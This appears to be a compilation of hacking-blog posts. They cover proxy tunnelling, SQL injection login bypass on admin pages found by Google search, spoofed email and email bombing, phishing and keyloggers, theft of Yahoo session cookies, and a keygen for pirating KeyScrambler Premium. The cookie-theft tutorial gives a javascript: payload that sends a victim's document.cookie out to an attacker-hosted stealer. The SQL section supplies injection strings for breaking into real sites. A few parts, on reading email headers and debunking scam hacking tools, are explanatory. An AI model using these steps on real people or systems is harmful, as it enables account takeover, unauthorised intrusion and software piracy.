Before you need to download your-freedom software on your PC 

                                          Click Here To Download

Lets us start the tutorials . . . 

Goto your-freedom and register a free account with them, then configure it with below:

click on configure: enter the following settings :-

YF server:

connection mode: HTTPS
tweak: none 
minimum buffer: 1500
reconnection delay: 5000
initial post size: 20000
FTP mode: both
then click on the account information: enter your username and password, click on 'AVE and EXIT ans you're good to go!.

change your proxy to 
use same proxy for all protocol

connect your modem ( or phone modem) and click on 'Start connection in your freedom software.

if your want high speed browsing with unlimited connection time , you need to upgrade your account to basic account . . .

1 month-=1,500
2 month =-4,500

note***** make sure you click on start connection immediately you connect your modem, else it may not connect****


First open 
write in the google search bar "Admin.asp and then press the search tab.
now a number of website opened with admin log page. 
now click on target website means click on the website you want to hack. Then a page with username and password has been opened 
e.g: welcome to adminxxxx

now the part password if is made on sql then the password is: 1'or'1'=1 
actually it is sql injection which breaks the server firefall. 

here are the list of common sql injections below:







') or a"='a

hi" or 1'=1"

****note*** this tricks is for educational purpose ******

Send , identify , trace Fake/Spoofed Email | Email Bombing | Email Spamming

Basics of working of Email

Email stands for Electronic Mail. 
Email sending and receiving is controlled by the Email servers.Email service providers configure Email Server before anyone can Sign into his or her account and start communicating digitally.Users from across the world register in to these Email servers and setup an Email account.

Email Travelling Path :-

Let’s say we have two Email providers, one is and other is, 
ABC is a registered user in and XYZ is a registered user in

• ABC signs in to his Email account in, he then writes a mail to the and sends the message.

• But what happens behind the curtains, the Email from the computer of is forwarded to the Email server of Server of then looks for on the internet and forwards the Email of the for the account of Yahoo server puts that email in that account.

• XYZ then sits on computer and signs in to her Email account.Now she has the message in her Email inbox.

Sending Fake/spoofed Email -:  

Fake or spoofed email means the email from any email ID. 
It doesn't matter whether the sender's email really exists or not. 
Sender's email ID can be

DISCLAIMER :- Know Hacking but No Hacking
Warning : Gaining unauthorized access over websites,systems or email accounts, spying on computers in an unethical manner, identity theft, intellectual property theft , black hat hacking are serious crimes.Iam not responsible for any of such kind of illegal activities performed by learners or readers.

Method :-

Using Websites : There are numberless websites that provide free service to send fake emails. But the problem is that they attach the advertisements along with your email.  But the best , I have found that do not attach the advertisements.

Click Here To Visit   {have some advance options}

What is Email Spamming and Email Bombing ?

Email Bombing as clear from the name is sending the mass emails that is large number of emails to a email ID in a single click.

Email spamming is like sending an email to large number of email IDs in a single click. 

These activties are performed mainly for the advertisements of the products or services provided by a company. Many spammers spam to collect individual's personal information through some stupid things like 'fill these details to get your lottery amount' and that information is sold to businessmen looking for the people of different categories. There could be many more reasons of spamming. Spammers use automated tools to collect as many emails available on websites,forms,chat rooms and send spams to them. 

How to identify whether an email is real or spoofed ?

It can be done by checking headers. Email headers is simply the text which contains the information about the mail servers that the email encountered in its path from the sender to receiver. It contains a lot of other information too.

Note: I am just telling you a few points about this so that you would just get an idea about the approach. This may or may not depend on some factors.

We can view email headers in gmail by clicking at 'show original', in yahoo by clicking at 'Full headers' and such kinds of options in other email service providers.

If  you get an email displaying sender's email like,, . Then it should be originated from gmail,hotmail and yahoo servers respectively. 
But if it doesn't, the most probably the email would be fake. 

I will show you by an example, I received three emails in my gmail inbox from sender's address ""  Sender's address shows me that they should have been originated from gmail/google server, if they would be real.

Note : There is a field called "Return-path" in headers.  If the email ID shown in this field and email ID you get as sender's email ID doesn't match, then the email is surely fake.

Can we get sender's IP address from Email Headers ?

We may or may not. Gmail, yahoo normally do not reveal sender's IP address. But when we send an email from a php script,  the headers might reveal Sender's IP. The conclusion is that answer to this question varies from different email service providers and the way how email is sent.

Can we trace sender's location, 
if we get his IP address ?

The IP address could only tell that which Internet Service Provider (ISP) is used by sender. Further details can not be revealed without the help of that ISP. Normally the Public IP is dynamic that is it keeps changing. We need to ask ISP about the user who was assigned that IP at the time email was sent. If sender has purchased a static IP address, it doesn't matter that when exactly was email sent. He could easily be traced.

Hacking Facebook-Orkut-Gmail-Yahoo account | The Reality

Folks, this is a must read post for the beginners who have just started hacking and for laymen who aren't interested in learning hacking but needs somebody's account password anyhow. I want you to aware about common misconceptions regarding Email/Social Networking Sites accounts hacking.

Otherwise those thoughts/misconceptions can seriously put you in trouble.We usually start like googling this, "how to hack gmail" , "softwares for hacking orkut","how to hack facebook" etc  but unfortunately reach some malicious websites, follow stupid instructions and our own accounts get compromised (HACKED).

Yes I wasn't any different and had been a foolish when I was a beginner

Okay talking in general , suppose you just have signed up for an account(gmail,yahoo or any other reputed website)

Your password  is stored only at two places

1. In website's database
2. In your mind
(Dont say a stupid thing that it is also saved in a text file on your PC or in your girlfriend's mind etc)

Fetching your credentials (Id/password) from website's database is almost impossible. They are paying millions of dollars for securing their systems. Here I should remind you that, I am talking only about the reputed companies like microsoft,google,facebook etc. 

Hard Core hackers might get success in compromising their systems.

Now talking about your mind, its might be really very simple to do this. 
Shocked ?
At this point, I must say that hacking  an email account depends strongly on carelessness/foolishness of victim. 

FAQs or misconceptions regarding the same:-

Does any free/paid  software/program/cracker exist to hack such accounts ? 

No  .You might get numberless free or premium software's which claim to crack email accounts. The software's just ask you to enter victim's email and start cracking/generating password.

I have already told you about two places where one's password is. From where the hell ,these software's would bring passwords for you ? . This kinda stuff is undoubtedly scam/rubbish.

Is there any free/premium online service to hack such accounts ?

No.You might have logged on to many websites that claim to crack any email account for some amount of money. They are completely fraud and be aware of them. Don't lose your money there !!

An Other type of fraud

You might have come across many tutorials/videos that instruct you
to compose an email to 

You are asked to write victim's email ID, your email ID, your password and are assured that you would get requested password within 24 hours.
Needless to say, it is an idea of be fooling innocent people . 

Ofcourse,your own account gets compromised.

Believe me , you cant imagine the number of people who become victim of such rubbish things. They lose their money,time,accounts but get nothing in return. So take care.

How to hack these accounts ?

Every method directly/indirectly involve victim's carelessness/lack of knowledge.


While signing up for an account, we are asked to set a security question like our nickname, birthday place etc so that we could recover our account in case we forget our password. 
Many innocent people sets the correct answer which they are not supposed to do. 
Gather some information about victim and try to guess the answer of security question.


1. Phishing - The most common way of hacking them is phishing. The common type of phishing is Fake Login Page.The victim is anyhow anyway made to enter his credentials in fake login page which resembles the genuine login page and gets hacked. 

                                                Click Here To Learn Phishing

2.Malicious files -  The victim is given a malicious file. It could be binded with or hidden behind a genuine file. It is usually a keylogger or trojan. 

A keylogger secretly records everything you type and sends to attacker. Obviously records your passwords too.

                                                Click Here To Learn Keylogging

3.Stealing Sessions - Talking in simple language, whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account. 
This piece of string or login session is destroyed when we click on 'Sign Out' option. An attacker can steal that session by convincing victim to run a piece of code in browser. Attacker can use that stolen session to login into victim's account without providing any username/password. This attack is very uncommon because when the victim  clicks 'Sign out' , session gets  destroyed and attacker too also gets signed out. 

                                                Click Here To Learn Session Hijacking

Note-You might be thinking that one could sniff the credentials sitting in same network. But I should remind you that, they would be encrypted ones and cracking the SSL encryption is almost impossible.


Sign up for an account at gmail/yahoo/facebook/orkut/hotmail.

Now forget its password and recovery options
Never login into it . 
Can anyhow the password be cracked/hacked.?? Answer is big NO.

Kindly Share this knowledge with as many people as you can and aware them about the misconceptions. Feel free to mention your queries/doubts in comments.


Hack Yahoo accounts with Session IDs or session cookies!

What are session IDs or session cookies ?

Iam Talking in simple language, whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account. This piece of string or login session is destroyed when we click on 'Sign Out' option.

Just login to 

Type in browser javascript:alert(document.cookie);(This Java Script works only in Internet Explorer) You would get a pop up box showing you the cookies. 
Now login to your account and do same thing, you would see more elements added to the cookies. These represent sessions ids .

Note: By saying , stealing sessions or stealing cookies, I mean the same thing. Sessions are stored in our browser in form of cookies. 

An attacker can steal that session by convincing victim to run a piece of code in browser. Attacker can use that stolen session to login into victim's account without providing any username/password. This attack is very uncommon because when the victim  clicks 'Sign out' , session gets  destroyed and attacker too also gets signed out.

But in case of yahoo, its not the same.The attacker doesn't get signed out when victim clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs  by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions for next 24 hrs. This means, once the  yahoo account session is stolen , attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs. 

Requirement :- Yahoo Cookie Stealer

             Click Here To Download 

Tutorial to steal session IDs :-

1. Sign Up for an account at any free webhosting site. I have chosen

2.  Login to your account and go to file manager. 

     Upload the four files that you have just downloaded.
     Make a new directory 'cookies' here.

3. Give this  code to victim to run in his browser when he would be logged in to his yahoo account.

Code :- javascript:document.location=''.concat(escape(document.cookie)); 

Stolen cookies get stored in directory 'cookies' 

4. Open the hacked.php . The password is 'hackerszone'. 

You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password.

Now it doesn't matter if victim signs out from his account, you would remain logged into it.

Detect Invisible Users In Yahoo Messanger So your Friends Cant Fool You.

Most of the time it happens That your friends make offline only for You in Yahoo...So that You will see him/her as offline and cannot chat .

Many of my friends ask me how to check if the yahoo user is offline or online...

So here are the top best websites which will show you if your friends are online OR offline




Secure YourSelf from Keylogger Using KeyScrambler Premium and Full

A safe journey online begins with Key Scrambler.

Key Scrambler Premium - Actively Guards Data Transmitted over the Internet.

When you try do something online, for example access your checking account on your bank's website, your keystrokes will travel along a path in the operating system to reach the destination application. 
Many places along this path, malware(keyloggers and Rats or simply keyboard hookers) can be physically or remotely installed by hackers to log your keystrokes so they can steal your user name and password and this is really a very dangerous threat.

Key Scrambler secures your keystroke data through the crucial path

How does key Scrambler Work? 

Actually any key scrambler works in three basic steps namely:  
Encrypt Keys,  
Bypass Malwares like keyloggers, rats or  
keyboard API hook programs and 
at last decrypt keys. 

I have explained the steps in detail below:

1. As you're typing on the keyboard, Key Scrambler is simultaneously encrypting your keystrokes at the keyboard driver level. Because Key Scrambler is located in the kernel, deep in the operating system, it is difficult for keyloggers to bypass the encryption.

2. As the encrypted keystrokes travel along the crucial path, it doesn't matter if they get logged, or whether the keyloggers are known or brand new, because your keystrokes are completely indecipherable the whole time.

3. When the encrypted keystrokes finally arrive at the destination app, the decryption component of Key Scrambler goes to work, and you see exactly the keys you've typed.

There are lots of Blogs and Websites Offer you only the free version of Key Scrambler,
But i am Offering Key scrambler Premium version for you guys, as i always try to give HARD SECURITY for My Blog Members.

As HackersZone is Specially for Hacking and Security Purposes. 

Well Now move on to Download and Installation part
Download Key Scrambler Premium Version From There Official Creators Website


Click on the Above Link and then Click on Download Premium as shown in the below  Screen Shot

Download and Install The Key Scrambler 
After Installing Reboot your Computer 
Now Activate it.
Download and Run the Keygen 


Then Select Premium in Products option and then Copy the email add and paste in to the Registration window and click Generate .

That's Sit Now you have Latest and Full Version of Key Scrambler Premium.

Enjoy Hard Protection.